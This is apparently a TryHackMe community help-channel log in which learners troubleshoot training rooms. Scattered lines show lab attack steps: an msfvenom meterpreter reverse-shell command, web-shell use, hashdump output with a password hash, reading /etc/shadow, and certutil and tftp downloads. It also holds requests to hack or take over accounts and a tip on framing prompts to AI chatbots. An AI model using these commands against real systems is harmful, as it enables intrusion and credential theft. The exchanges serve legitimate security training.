Im stuck on the AI path, jailbreaking room, task 5 question 2 and 3. The answers seem obvious, but don't fit the structure of the required answer. I've even worked with copilot to help me out, and it keeps getting the same answers.

yeah I think they inverted the answers.
Question 2 answer actually solves Question 3. Question 3 answer fits in question 2 slot, but it doesnt solve it.

I just created a room bug report: #1494852669834264688 message

Have you gotten past the room? Thanks for doing a big report

Gave +1 Rep to @regal basin (current: #823 - 9)

Not yet. But I dont think I could cause question 2 still not triggers with the answer from question 3, which I am 99% sure it was supposed to.

I just got question 3 to work like you said. I was thinking the other answer was gradual escalation, but that doesn't fit

yep, tried that too.

This is kinda annoying, I only have the last module left, and this one question. If we can figure it out, I'll be done tomorrow

I just figure it out lol. I am not even sure if it is a bug. Now I just think both questions talk about roughly the same concept, that's why I thought they were inverted.
I found the solution on task 8. If you want to look for it. I also put a screenshot with the solution on the updated bug report.

I updated the report again lol. Now I am convinced it is a bug, question 2 and question 3 are just 2 vague ways of refering to the same thing, answer to quesiton 3, and the real question 2 is missing.

Thank you, I've copy and pasted that term multiple times and it kept denying it. Now it takes it

Gave +1 Rep to @regal basin (current: #776 - 10)

now I am not even sure if I did that too, cause I do remember the term haha. Maybe I tried it on question 3, I am not even sure by this point. the room is spinning haha

Right? Now I'm actually motivated to hop back on in a bit and finish up the last module. How far are you on the path

Not very far. I havent touched modules 4 and 5 yet. I skipped some rooms from previous modules that dont have tickets to complete at the end, and I still need to get the remaining tickets from module 3 after this room.

This was the only 1 so far that was broken.

Good to know! I was actually worrying I would spend way too much time in another room like I did with this one lol. Thanks for the heads up. 😎

Gave +1 Rep to @worn torrent (current: #1483 - 4)

how can I fix this error : thmVNC encountered an error?

Just completed the whole thing

What was the timestamp of the server response containing the payload? ---> masquerade which format is it?, and I decrypted the exe, but the question and answer to Which encryption key and algorithm does the client use? was not excepted

why not using wireshark UTC timestamp for the answer why guessing?

hlo

anyone has done ContAInment room?

Test

lol

Which room is this from?

Is it from the Attackbox?

Yeah. But now the problem is clear.

how can one know the exact process name here,netstat commands dont help they only list ports and some more details

the bot explanation is still vague

Detail-Focused, Curious and Love Puzzles

Security analysts are often referred to as the digital defenders of an organisation and sit on the blue team. These people monitor, investigate and respond to activity taking place on an organisation's devices and network, and play a significant role in an organisation's defence.

Using their skills, security analysts investigate and piece together potential security incidents, known as alerts, to decide if further action is needed and respond appropriately.

An example of a potential security incident is an employee who works in the London office who suddenly logs in from another country. An investigation is required to determine if this is legitimate.

Not only that, but security analysts are one of the most in-demand roles within cyber security, offering a long and rewarding career path.

A Typical Day as a Security Analyst Involves:
Monitoring activity taking place on the devices and network of the organisation.
Investigating unusual or suspicious activity, such as strange logins.
Piecing together information to understand what has happened, when, and how.
Working with other teams to improve the organisation's defences.
Progression
Security Analyst is a broad entry point into defensive security, with many paths to specialise later. You can move into areas like threat hunting, incident response, or malware analysis. Incident responders handle active attacks, while malware analysts examine the tools and code used by attackers.

Answer the questions below
Security analysts play a significant role in an organisation’s _____?

Fill in the blank:

help pls

how did you tackle thiss

Medium, 🔵 Blue Challenge 🔵
Our company may have been compromised, we need your help ASAP.

A new room has been released! Check it out: https://tryhackme.com/jr/masquerade?utm_campaign=cr_masquerade&utm_medium=social&utm_source=discord

I can't submit any answers in a room offensive security in cbersecurity 101. it redirects me to "tryhackme.com/500?errorId=c5aa9d5c887149e7b50833ab32ce25ac". Does anyone know what I should do about it?

clear browser cache maybe

Remember to use British spelling on your answers 😜

tried in two different browsers without any extensions running

Which question is that

Anyone know how to get the flag for owasp juice shop acquisitions.md I've downloaded the file and its supposed to give a flag after but I get nothing

I find it thanks

Gave +1 Rep to @forest pawn (current: #3730 - 1)

Now there is a full walkthrough out on YouTube for the jailbreaking room

https://tryhackme.com/room/powershell

I did this room. First couple Tasks were okay/easy
Then even the basic scripting part was kind of a big jump, had to research basic syntax like usage of curly braces, syntax of if etc.

And then the "intermediate" script was so hard that I could not finish it without almost copy-pasting a solution from an online walkthru writeup.

I finished the basic powershell room before as well as came accross with some powershell usage (powerup, Privilege escalation etc) rooms.
Did I miss something and could have found it somewhere?

It really seemed impossible to finish.

Anyone else struggled with that?

who knows how to load squawkervpn
i forgot how to start it in terminal

hi my name is sean

hello, trying to arpspoof and im having problems using urlsnarf in kali linux, where im trying to see the traffic between pfsense firewall router and metasploitble virtual machines, its not showing anything from the ports, if anyone knows much about this , please could they help

Is this related to a THM room? If not, suggest to post it in #infosec-general

thanks

Guys I need help with the wifi hacking 101 room

wtf do you do with the file that you download for the last module?

that zip file?

Minotaur's Labyrinth broken

https://tryhackme.com/room/aimlsecuritythreats

At which step are you having issues on?

Yep, open chatbot, and just subsitute the last prompt, like what are these values:
DNS over HTTPS (DoH) Port , SYN flood timeout and Windows ephemeral port range size?
in format THM{___/__/_____}?

if still says wrong, then say its false bot will give you another flag.

inside a computer lab the 2nd room the drag drop computer components is broken bro iv been tweaking for a good 30 mins

I think the “Advanced SQL Injection” room is broken. When accessing the Target IP Address, only a blank/white page appears.

I need some help - in the Shells overview room, Task 8 question 2 . I successfully uploaded the php file to the web server and now i got access to cmd via the url but i cant navigate to the flag. gemini&chatgpt are refusing to help me

the url im using - http://serverip:port/uploads/shell.php?cmd=ls

the ls command returns to the browser the shell.php which i uploaded

where do i find that flag

i found it

Hello, I can't use Kape in Expediting Registry Analysis... the targets table only shows the header and you can't zoom out or rearrange the gui. I was able to use cmd for Task 3 but now I'm stuck on Task 6.

Everything lol, the website is with the html empty, nothing works

can i get help with Metasploit: Meterpreter i cant find out how to the NTLM hash of the jchambers user and the ai is stuck in a loop and when i run hashdump it crashes

did you complete it?

Hi im not a hacker can samone who is a hacker help me with hacking a discord acc

no im still hitting a wall

Hi

has anyone solved intro to C2 but using his own machine?

not the attackbox

Hey, this is not the purpose of this server. This is the official forums for TryHackMe, a cybersecurity learning platform.

Hello everyone, I am a new self learning DevSecOps in the making. Hope to learn, learn some more, than learn a little more 🙏🏾🙏🏾🙏🏾🙏🏾

has anyone decrypt the client com from Masquerade?

I could only decrypt the exe

has anyone completed room: Data Poisoning in RAG Systems

hey all, newish to thm. im in room https://tryhackme.com/room/meterpreter

im trying to migrate to lsass.exe but meterpreter keeps diying. tried it again and now the target box took a crap. is this normal? restarting the box now and trying again.

Hah same issue.

now i get this on a new target box:

[] Started reverse TCP handler on 10.64.120.203:4444
[] 10.64.165.164:445 - Connecting to the server...
[] 10.64.165.164:445 - Authenticating to 10.64.165.164:445 as user 'ballen'...
[] 10.64.165.164:445 - Selecting PowerShell target
[] 10.64.165.164:445 - Executing the payload...
[+] 10.64.165.164:445 - Service start timed out, OK if running a command or non-service executable...
[] Exploit completed, but no session was created.

am i alone on this? previous room had similar issues.

similar issue on new target box

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[-] Error while running command hashdump: undefined method `id' for nil:NilClass

Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:63:in report_creds' /opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:43:in block in cmd_hashdump'

5th time's the charm

dammit... target box froze up searching for the secrets file. cant catch a break

[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter >
[*] 10.64.167.45 - Meterpreter session 5 closed. Reason: Died

i ended up just following the walk through for it and still messed up

yea just looking for someone thats been doing this for a while to let me know if this is normal. i just finished the room. had to restart the target box like 8 times.

hope the pt1 cert is not like this

Thanks – that worked!

Gave +1 Rep to @robust mural (current: #3732 - 1)

HI im coming towards the end of the SAl2 exam but ive really struggled with the VM's. On the following paths on the exam they did not deploy and I did what I could without the vm being deployed. This is very heartbreaking for me.

I struggled with the following :

Phishing Payroll VM (Medium)
Agenda Deception VM (low)

I do not want to start the final Vm named "no flight today" this is because ive had an issue with the vms and sla is about to expire. Please help with this issue as I only have 44 hours left of the exam.

Its taken me so long to do the exam but knowing the fact that im losing marks on the vms not being deployed is very disheartening and killed my morale. Splunk , edr and all the others were able to get deployed but on each vm section it just did not load up and the sla timer was going down.

I was following a CTF from a THM member and he uses the command "amass enum -d" on a kali machine... to find subdomains.. but when I try to do the same, show the message "The enumerations is fail, Discouveres are being migrated to local database"

so my VM its local, so how could he do it this if this is the same challenger ? cz have some task that we need go on git repo

Hi I have a problem with IDS Fundamentals, Practical Lab part. The task is to run Snort on this file and answer the questions given in this task.

Note:The file Intro_to_IDS.pcap is placed in the /etc/snort/ directory. You have to change your directory to /etc/snort and run the analysis command on that new file the same way as we did in task 4.

I run the command but I keep getting error, no Intro_to_IDS.pcap file. The file is obviously there

Can anybody tell what do I do wrong?

could u check ur permissions ls -l

maybe

yes

Hi all, for whatever reason most of the machines involving windows are really slow, and tend to get stuck pretty often to the point I have to restart them. Is that a common behavior? (I have a premium account if that can help)

In the room flarevm arsenal of tools for example, I'm not able to go through Task 3 because the machine get stuck almost anytime I get into the process explorer.

Actually, it freezes after a minute. Seems like this is a common issue according what can be found in THM's discord.

You’re not in the correct directory, you are in the ~/ but the file is in /etc/snort?

ok

try ..
cd /etc/snort
ls
cat Intro_to_IDS.pcap

I think the problem is simply the fact that it's in the current directory.

In -c you’re accessing a file from the /etc/snort directory from another directory correctly. Or cd into it like @primal pollen suggested

now I get another error

ERROR: /etc/snort/rules/local.rules(9) Unknown rule option: 'sid10003'

anybody knows what sid10003 error is?

show me the rule

sid

u need to put sid:10003 something like this

or sid=10003

Personally no, but check the task, or google the error and see what comes up maybe?

I checked it, it means that Snort cannot understand a specific rule you have added to your local.rules file, specifically on line 9

The issue is that sid10003 is missing a semicolon (;) separating it from the previous rule option. I checked local.rules and it has every semicolon it needs to have

so it doesn't make sense now

I did a quick search for "snort rules sid" and got a writing guide, that might help, it also needs a colon (:) separating sid and the signature ID.
https://docs.snort.org/rules/options/general/sid

Thanks

Guys who know how use termux?

https://www.youtube.com/watch?v=ByX7-6f1ywI

how this guys could use the command "amass enum -d marvenly.com" if for use this, need external connection cz the repository is online.. im stuck on this

If something isn't accessible anymore I usually check a write-up, sometimes those contain flags that helps if you cannot find the answer anymore.

Does anyone know why Firefox will not allow me to connect through burpsuite even after downloading the certificate for portswigger

Im running Ubuntu Linux

Also the browser on burpsuite will not work either

i have a doubt in wreath room; while doing nmap and ping sweep, i am getting different results. am i missing something ?

when i pivot and perform nmap scan from my kali machine, i get only 3 port again.

Same problem...

I have tbh problems with privilege escalation on thm „Challenges“ rooms. How can I learn it? I'm a free user btw, so please don’t recommend me vip rooms xD

Hi, I don't know English, so I'm asking for help. I've tried "pentesting" and various other terms, but nothing seems to fit.

What process do penetration testers follow when testing an organization for vulnerabilities?

10 letters

Hey trying to do that Detecting Web DDoS room and Splunk is not running. I've tried restarting Splunk but port 8000 still doesn't show as open when I run ss. Should I just re-start the active machine?

?

Try METHODOLOGY.

Should work.

It's not working ((((, it needs to be one letter shorter

Yeah, not sure what is could be. Penetration testers typically follow a structured five‑stage process: reconnaissance, scanning, vulnerability assessment, exploitation, and reporting. The word that describes this process is methodology. But that looks too long. Try synonyms for it, or use a tool like copilot.microsoft.com

Is anyone else having issues pulling up the VM in the "OS Security" room?

Wait, never mind. I figured it out.

hi everyone. I was wondering if in the room AI Forensics (https://tryhackme.com/room/aiforensics) it was possible to complete the challenge using OpenVPN and a local machine

this linux rootkits, how they can work with newer kernel, reptile for instance, need a kernel older than 5? I mean who uses so old kernels?

Sorry 4 that

@rose cypress

Which learning method does not require human-labeled data and can extract features from raw, unstructured input? its not unsupervised learning, the answer is 4&8words please help

Hello in the wireshark intro room the text said:

Application Protocol (Layer 5):This will show details specific to the protocol used, such as HTTP, FTP, and SMB. From the Application layer of the OSI model.

But isn't application protocol layer 7 is this a mistake or can anybody explain to me why

its may be referring to TCP/IP model, as in this application layer is on 4 or 5 and is the latest networking model than OSI.

Oh I see so each packet in the packet details pane of wireshark is formatted in TCP/IP model?

and OSI model says layer 7, but your wireshark is referring to TCP/IP model where application is on layer 5

and not the OSI model

ohh okay thanks bro

Gave +1 Rep to @analog heath (current: #508 - 16)

u got it man 😉

Hi guys, do you have any recommendations for rooms similar to Ra and Ra2 related to Windows AD? I enjoyed these a lot.

No need for an attack box or local box, the rooms opens a split-screen view.

I'm doing Hoppers Origin and I need to access as Administrator in TBFC.LOC. Has anyone got over this issue? I'm using Certify and Rubeus. I get the Certify ticket. However Rubeus says "Client name mismatch". Any help would be gladly appreciated.

I am on https://tryhackme.com/room/winadbasics room, in the instructions "Now let's use Phillip's account to try and reset Sophie's password. Here are Phillip's credentials for you to log in via RDP:", the room has me logged in as admin, but when trying to sign out, it auto logs me in as admin again, when I try to rdp, it gives an error when using Computer: "THM" and User Name: "phillip". I feel like i'm misunderstanding something if someone can clarify <#

I had the same problem. I used Copilot (copilot.microsoft.com) to troubleshoot, and I remember running a command in the terminal that got me the right access. Unfortunately, I don't remember exactly what I did. But use Copilot, it is extremely helpful. Context matters though.

Tried checking with gpt earlier and I think I’m just likely misinterpreting something since it’s mentioning to use some IP address but the tutorial doesn’t mention an IP for the phillip account

Hold on, looking to see what I did in that room to see if I can remember.

@torpid pulsar Please slow down. Further spam will result in a short timeout.

Hold on, that was because of the large block of pasted text

I direct messaged you. The server thought I was spamming because of all of the text.

Ty ty, will give it a try once back home 👏

No prob. Hope it works!

Just as a follow up, I came right ^_^ ty for the help my guy

Gave +1 Rep to @torpid pulsar (current: #3736 - 1)

Great! Glad I could help!

Hi everyone, I'm in the Phishing Analysis Tools room - task 3 asks for the Talos domain reputation for malware-test.com, and expects an answer with 7 characters.
However, the current reputation for the site is 'questionable' (which obviously doesn't fit). How can I report this?

#1333993673381253162 TIA. The dated answer (now 5yrs old) is Neutral - seems that domain's rep got downgraded even further;)

Nevermind. I think I found a solution to my problem.

Masquerade TryHackMe write-up — full CTF walkthrough from phishing to covert C2.

https://m8x2d.medium.com/masquerade-writeup-tryhackme-from-phishing-to-covert-malware-communication-39013c894dac?postPublishedType=repub

I did another approach and the key doesn't appear in my decrypted binary

hi guys,
can someone help me with a little script problem? I guess it's easy but i couldnt find the error.

i did it on my own 🙂

how can i restart my vm im stuck in career in cyber task 3

Guys I am having a problem

Someone help me with that

with what?

Hi! I'm stuck on the 'Experience Cyber Security' room, Task 4 (Become a Defender). I can't find the flag. Any hints on what to do? Thanks!

It was a bug and I fixed it myself

I tried a bunch of things and just gave up. md5 command on Mac works fine. Must be something with Burp Suite. Gemini says could be the OS adds hidden characters or something like that.

Are you still facing trouble with that room?

you do not need a vm for task 3 bro

, I'm still trying to find the flag, but I'm not sure where it's supposed to appear, Any hints?

Sure but cld u repeat the room name again

I can't find one with the name u sent b4

@sharp roost there is a room called become a defender but not one called experience cyber security

The room is called 'Experience Cyber Security'.

Ok cld u provide a screenshot with the name or the link to the room, I just can't seem to find it

@fair stream i get the lesson focus is on Decoder, but think about workflow for your future self - pasting ssh keys into Decoder manually, one at a time is so tedious, time consuming and error prone. Let bash work for you:

ms@Mac ~/Burpfun/keys % for key in $(ls);do md5 $key;done
MD5 (key1) = b523e7a5b4e82a254f2669e46a7c012a
MD5 (key2) = 915fb4c73cc1acc350fae502f6655500
MD5 (key3) = 3166226048d6ad776370dc105d40d9f8
MD5 (key4) = c0a448edc9f1bc4b10c0ffc6eb79a005

another terminal trick for mac is pbcopy<key3 to handle the copy to clipboard op, then paste into Decoder as normal

Windows Threat Detection 2 Task 3 Question 1 , "Looking at Sysmon logs, what is the first command the invoice.pdf.exe executes?"

How can I find the answer? Even Echo gave me a hint (and answer) and I still can't find it in the event logs.

100%. So far Burp Suite is awesome but some things are just better handled on the CLI. BTW what a terrible name for a tool.

agree;)

hey guys.. im stuck in a room.. and is the first time im using wireshark and the question is " One of the packets contains login credentials. What password did the user submit? " .. so i tried to searching after add tls - pre-sheared-key log to see the passwords.. but nothing to find.. ive tried http2.headers.method = "POST" or strings like pass, user, pwd etc.. but nothing

link to room, task and question #, else we are stuck too;)

https://tryhackme.com/room/wiresharkthebasics

one down, just two more items to go... tic-toc

I don't need help, I passed the room successfully, thankfully! Just pasted the link because I think that is the room he is talking about.

sometimes it takes a village-lol. Together we can solve this...

Guys, which VM would you recommend for Linux distributions?

Can anybody help me regain admin control on my PC

I know it sounds like a cheater's answer, but try ChatGPT or Microsoft Copilot (copilot.com. Works without an account). Nine times out of ten you'll get what you want. Just make sure it knows you are working on your own PC, not somebody else's 😉 😆 Then you won't get anything!

ty, I think they should have put the basic concepts before the class... it caught me surprise.

Gave +1 Rep to @torpid pulsar (current: #1834 - 3)

I did the same thing. But, I usually have ChatGPT open on another monitor. Not as a cheater, but as a guide to walk me through it a little better. Sometimes THM is not very clear! Using ChatGPT, I was able to finish it up. I can't remember exactly what I did, wasn't it like filtering for a password, right?

Yes, of course, I have a "good" understanding of networks, but I actually had no idea how to search for something specific in Wire, but now I know.

As in which distribution we wld recommend or which virtual machine application?

Kali Linux

Ya so kali is a distribution

So use virtual box or vmware

Thanks bro

hi

Is there somebody who can help me with room Azure: Eyes Wide open.
Everytime I try to connect on PS I can only see an empty subscription and I reset te lab multiple times😭

Is Steel Mountain room working for anyone?

hiii

in tcpdump, what does length express? The number of bytes?

HI, I have question about Week Mission ? Could someone explain me, what 8 question i should answer ?

"Answer 8 questions in Getting Started"

my name is juna

I am in the investigating windows 3.x room and need to copy paste file hashes and encoded data outside of the victim box. I need to use remmina with rdp to be able to do this. However remmina and the victim box keeps erroring out even after booting up a new attack box and victim box.

If I could upload a picture I would. The error is "ERRINFO_LOGOFF_BY_USER

hi

Can someone please help me with this?

What's the issue? You haven't supplied an answer

I've already submitted several answers and it's not giving me any feedback.

PenTesting, Assessment, and several others which are related to the question, and nothing

Refresh the page

The form says there is a problem

I already refreshed the page, but it's only the answers I'm posting that I want you to check.

Have you tried planning?

Planning Is very Little

Can you link me the room?

https://tryhackme.com/room/careersincyber

I'll be honest my room looks completely different from yours

Mine doesn't have any questions

Just no answer needed boxes

But I did it ages ago

ye same also opened the link ^^

They must have locked out the content for those who have already done it

It was engagement, but I had misspelled the word.

Just like when you misspelt million 😂

Just double check your spelling mate

beep beep

engagement

I'm already networking, hahaha

Sorry bro, just saw your post

Dont worry

Bro cld u share a screenshot of it?

It was a rootkit

I was diddied

Badly

Haven’t seen something this bad in ages

Hi everyone

hi

Hello there is an issue in the room Request Smuggling: WebSockets.
In the task 4 we are to leverage a SSRF to trick the proxy into thinking the protocol has been successfully upgrade but in the backend, it is not. However, there is a specific problem in this particular port 8002 in this room. 8001 works fine, but in this one, the' /check-url?server= ' is not responding to any request at all. I even tried restarting the machine, but the same problem persisted. The actual root file works fine on this port however the only endpoint that is not responding is the check-url one that is crucial in solving this lab as we need this endpoint to work to make a connection to our controlled server to tunnel our request through the proxy. So, the key problem i noticed is /check-url is not reachable at all. Can anyone fix this or tell me an alternative if i have missed something on this one

@ruby gate

i cannot subscribe , an error accured

For tryhackme

I finally did

now using this machine, cannot find anything here !!!

Hello , i have an issue no machine is being shown in idor as shown in the photo , if there is something wrong that i can't access it or i am doing something wrong tell me, i tried also different browsers but i think it is the same problem ; task 7

you probably need to start the attackbox aswell

since i think the machine in this room does not provide a split screen

i cant verify since the room is for premium users only

but thats my suspicion

i am good now, machine is working

yep , thanks for the help and it doesn't provide a split screen i think so

Gave +1 Rep to @charred mauve (current: #44 - 261)

Hello so i was doing elbandito chall and port 80 is not working which is imp to access login panel in order to complete chall.

Anyone help? It's urgent @wispy comet

Tried restarting many time but no use... Checked writeups also if I'm wrong but I wasn't.

Burp Suite: The Basics i cannot connect http://10.48.174.18/ challenge at all.. stuck!! i cant continue challenge..

are you on attackbox? or using your own machine?

i try all of them already

are you using the attackbox in the browser

tried with another region ovpn conf?

yes i try attackbox.. failed and then own .. failed..

if using the attackbox in the browser just terminate both and give it 5 minutes then go to the url

i will check the specific room for you now though and see if it works using attackbox in my instance

but your own machine needs to be connected to the thm network with that ovpn file, u didi that?

ok i will try to terminate both first..

wait

is it the task where you have to use foxy proxy?

which specific task in this room are you doing

i dont, i will try.. last time i dont think about ovpn! thank you i will try

Gave +1 Rep to @analog heath (current: #491 - 17)

yes with foxy proxy

yea if your not on the openvpn it wont work on your local machine

make sure you import the certificate

wait nvm thats burpsuite that needs a cert

should work fine if you just run openvpn on your local machine then use foxyproxy

just make sure its set up as it says in task 9

once you do what the task asks correctly and turn foxyproxy and intercept on

you will see your browser never ending load

because the request is actually in burpsuite intercepted

and you need to forward / drop the request in burpsuite

so that might be what your confusing the not loading with?

already have it

The proxy server is refusing connections

are you able to send screenshots or anything

and which openvpn or foxyproxy?

openvpn already running

foxy burp on

and on what port burpsuite is listening?

configure foxyproxy to that port.

8080

8080 is default yea

intercept is on

on burpsuite right

yes intercept on

refresh the page see if req is captured.

double check on thm too your actually connected

if your using openvpn and not the attackbox

@wise dune if not then go to proxy tab and start burpsuite chromium. it will mostly work.

yea just use burpsuites browser at that point

can u able to ping the IP or open that url on normal browser??

the machine ip you can open on firefox or burpsuites browser yea

hes just using foxyproxy specifically so he can use firefox to capture the traffic to send to burpsuite

you can open the url just you wont be able to send the traffic to burpsuite

Anyone here "Elbandito" ?

never done it sorry

target machine is up?

he mentioned all of that in his first post and hes tried rebooting etc

yes

Yeah everything maybe something is wrong with room?

In port 80

let me check, if it works on my pc.

i try to terminate now

Yeah I'd appreciate the efforts

on my kali machine only ovpn right?

arif in my opinion

terminal i mean

just try use the attackbox

and use burpsuites browser

to use burpsuite

in burpsuite there is the open browser option

this way you arent using foxyproxy or firefox

Ping me if you done

as this is easier than diagnosing any number of issues on your own device

its a target machine issue. there's no port for web. only i see is ssh and a forbidden page.

wait

80 is not working, 631 behind waf and 8080 is for smuggling request

Guys how to connect OpenVPN? I imported a configuration file but it requires a username and password I don't know them

now i can see port 80, but can't ping it. as its server side or target machine issue. in short, server is dropping my every req.

Exactly but it was supposed to open as I saw multiple write ups to confirm

wait a sec.

Sudo openvpn --config /file_location

Then enter your local pass

@eager smelt

add that IP in /etc/hosts with Domain name elbandito.thm

@eager smelt it was working. we need to add hosts, and work with this domain on port 8080.

No use for port 80

8080 was already working

hmmm, as it drops every req, so i don't think any use of it for now.

Yeah ig room's scrips might be failed when compiling

10.48.150.62 it took forever.. never open from burp browser

and port 80 is actually failing, see on writeups too. https://0xb0b.gitbook.io/writeups/tryhackme/2024/el-bandito. start from 8080 only.

did u tried attackbox?

it still on portswigger long time

its on attackbox

so can u ping the target IP? or can u access web on any normal browser. on attackbox

-- 10.48.150.62 ping statistics ---
8 packets transmitted, 8 received, 0% packet loss, time 7148ms

Page should show "nothing to see here" but here not even responding to ping 🫠

show me screenshot, actually what's happening on your attackbox.

i dont know why this chat dont have upload my screenshot!

verify your account with your thm account. use command /verify and a discord token from your THM account settings.

where is that..

bro its working well, turn off the intercept mode 🙂

when it needed to capture req, on the intercept mode.

its work! but without intercept anymore?

i try port 80

its back running 8080

check burp suite basics room again. see how intercept works.

when u need to edit or modify any req, u have to intercept. if intercept is on, then u have to manually send or drop the req to work.

i can see many req in pending in your burp, tap them and send them, to load your page. or instead use intercept mode only when its necessary.

but this is me on basic room already

sure, now see tasks to learn about burp, and also off the intercept mode for now! and follow the url.

if the intercept mode is on every req u made is got hold on bursuite till u manually send them.

so that's not a issue, its just a learning mistake, get know more about proxy tab and intercept mode.

ping me whenever u got stuck further.

in the wazuh room I was stuck on this task 4 and I read walkthroughs and even watched the solution video and followed their steps still I didn't get the security event data being generated. what did i do wrong? or is it an issue of the site?

in fact everything I do on it, i'm getting the same error message

I need some help on the Metasploit: Exploitation module. I am using msfvenom to generate a payload for the Linux target system. I have successfully ran the .elf file on the target system and created a meterpreter session. Then proceed to run post/linux/gather/hashdump with the correct session id that has the meterpreter session but every time I do it gives me the error: Post failed: ActiveRecord::RecordInvaild Validation failed: Session can’t be blank

Thank you in advance

ur session is created correctly? check sessions

Yeah I see it active and can switch to it

Type: Meterpreter x86/linux

Root @ IP

Shows the connection as well

then connect back to meterpreter and then shell, type cat /etc/shadow

if u r root u must have read permission, if works, then again try with that hashdump module.

and also make sure to set session with its id in this hashdump module.

That command works using my meterpreter session. I ran the post/linux/gather/hashdump exploit with the same session ID as my meterpreter but still no dice. I put “set session 6”

could u try with x64 linux exploit for better communication?

Let me try that

bcuz x86 sometimes gives error when target machine is running on x64.

Ayyyyyy that worked so much better! Thank you!

thank you for your guys here help me, i just finish this basic room, i will try to learning more with this burp again, question is why last one need to hack? what is purpose maybe silly question

Gave +1 Rep to @analog heath (current: #470 - 18)

good evening i'm Aramat , i begin TryHachMe for beginner, i search to study cybersecurity at ITS school after work, inthe room i arrived to the third step, my answer it's ok, but i don't know why. Excusme for my english i'm italian if someone know italian i'm very happy to write in two language

Did you resolve the issue and manage to connecto to KoTH using vpn profile? Or did support help you with that? 🙂

I'm trying to do the Alfred room, and task 2 question one asks for the final size of the payload that I have to generate with msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe I generated the payload, and even made sure that it worked, but I apparently do not have the right answer.

nvm, I was able to find it in a writup

Can anyone help on SOC Metric Objectives Task 3 Question 2.

SOC team received alert after 12 minutes.
L1 moved to In Progress 10 minutes later

After 6 minutes the alert was escalated to L2 and they spent 35 minutes cleaning the malware
What's the MTTD, MTTA, and MTTR

I tried 12,10,41 | 12,16,35 and a bunch of other combos that didn't make much sense

Nevermind, figured it out, the MTTR needs to include the 10 minutes that L1 took to move to in Progress

I want to learn cybersecurity

Possibly learn how to hack or connect with likemind

i have a problem, i need to switch back to my machine from attack machine and can't figure out how to do it

i tried escape

Hi who can help me with a 2FA on a cracked account

hi

there shld be a - symbol on the bottom, or an option called terminate in the room details

Hey im trying to purchase a premium with my Credit Card but it keeps declining. I have plenty of funds in the account any suggestions or anyone else running ino this issue

Working on Breaching AD Room, Task 6 - does anyone know why my ||tftp wont download the bcd file|| ? tried on vpn and on attack box

Hello, our doctor assigned us room OWASPTOP10 to complete and the room was open before, but I think due to a bunch of students accessing the room at the same time it got locked for us. I've had a friend from a different country able to access it completely fine. Could anyone help unlock this room before the due date of the assignment?

certutil -urlcache -f "http://10.200.70.202/x64{B2C8C206-3AAA-4E25-9E9B-17E78C423EE5}.bcd" conf.bcd

Similar issue? im big confused 🙈

it's always "DNS" check your settings

thm@THMJMP1 C:\Users\thm\Documents\mx0>tftp -i 10.200.70.202 GET "\tmp\x64{C0941F7D-407A-449E-BCC6-A7C536F55A8B}.bcd" co
nf.bcd
Transfer successful: 12288 bytes in 1 second(s), 12288 bytes/s

thm@THMJMP1 C:\Users\thm\Documents\mx0>

thanks, not sure what it was, but suddenly its working. Didnt need to change any DNS settings on the jumpbox. hate these types of issues ><

Gave +1 Rep to @slim bison (current: #364 - 26)

gg - hang in there - if you are planning on AD testing - this kind of troubleshooting never goes away - imagine 10,000 servers in scope

I think the walking an application room is messed up. I found the answer for the directory listing flag and it won’t let me put it in correctly

link to room, task and question# would be helpful - have you already tried manually typing your answer (hidden chars are a thing)

I figured it out. Thank you. I got ahead of myself and was tying that one in 😅

Gave +1 Rep to @slim bison (current: #355 - 27)

Did thm change their network configuration in regards to vpn <-> local machine? I cannot seem to establish a reverse shell from the target server to my local machine via vpn.

Hello,
I’m a CS student specializing in cyber security, Newer to cybersecurity but really motivated to learn. Interested in ethical hacking, blue team skills, and labs on TryHackMe. Excited to connect with people here and grow together.

Hello,
I'm here purely out of passion. I want to understand as much as possible.

Hello, I have created a room. I cloned a room to experiment with the feature, but when I tried to make changes to the difficulty and the room code, I consistently received the following error message: “Cloned rooms access cannot be downgraded.”

I have since deleted the cloned room, but I am still encountering the same error.

I would like to make the following changes:

• Change the difficulty from Medium to Easy
• Change the room code

u would understand a lot more efficiently on the platform itself vs this channel: https://tryhackme.com

hello

i got problem i need help

in red team threat intel task 7

Hola........

link to room, what is the issue, screenshots, error messaging goes a long way for others to help you.

Помогите пожалуйста мне пройти комнату на сайте мои ответы не принимают

hey guys, i got a problem with the open vpn client, keeps asking for creds to connect? anyone have this issue? #room-help

I think u need to be premium for use unlimited

It would ideally be in #site-support , but can you give more information on your issue like what OS are you using, what OpenVPN client you are using, etc?

Hi, this is an English only server. Thanks!

Can you provide more info on the problem you are having?

Hi nvm I thought its a problem because there is not a input text in the radar but all good Thankyou

The creators lounge might be your best bet.

Do check #start-here

When did you last connect to THM OpenVPN?

#site-support message

Earlier this morning. The boxes being used in the room cannot find a route to my local machine albeit being able to be pinged.

Thanks. Where can I find it?

Gave +1 Rep to @vagrant fern (current: #11 - 942)

When you do an ip a, what IP range is assigned to you? Also, do check that the target is spawned in the same region your THM OpenVPN is connected to.

Let me figure it out how to assign it to you. 😅

➕ Gave the role Creators-Lounge to emoji_floppy

Can you check now?

Found it. Thank you very much.

I am facing error when submiting answer for offensive security intro and other module as well same error showing "Opps this page failed to load" with error Id

please help as im paid user

Oops, this page failed to load
Something went wrong while loading this page. Try refreshing to give it another shot.

Error ID:
fb02b22a9ad149488db4af69a6c2e1f4

Try a hard-refresh? (CTRL/CMD+SHIFT+R)
Also try logging in with a differet browser or incognito/private mode

Then you can try opening a ticket from the chat-bubble (in your dashboard page, among others - but AFAIK they're only active M-F during UK business hours 🤷‍♂️

Do you think it's beneficial for me to do CTFs where I've seen 80% of the content, but haven't seen 20% yet?

I was doing one that's categorized as "easy," but at the end, I realized in the writeups that I needed to use reverse-shell, but I haven't learned that technique yet.. im still on 70% of 101 path.. I got a little frustrated and looked at the writeup to understand, but I felt like I was cheating... by the end i understand how to do it and completed the ctf.. but was not by myself.

It happens - I like two strategies: time-boxing and/or rotation
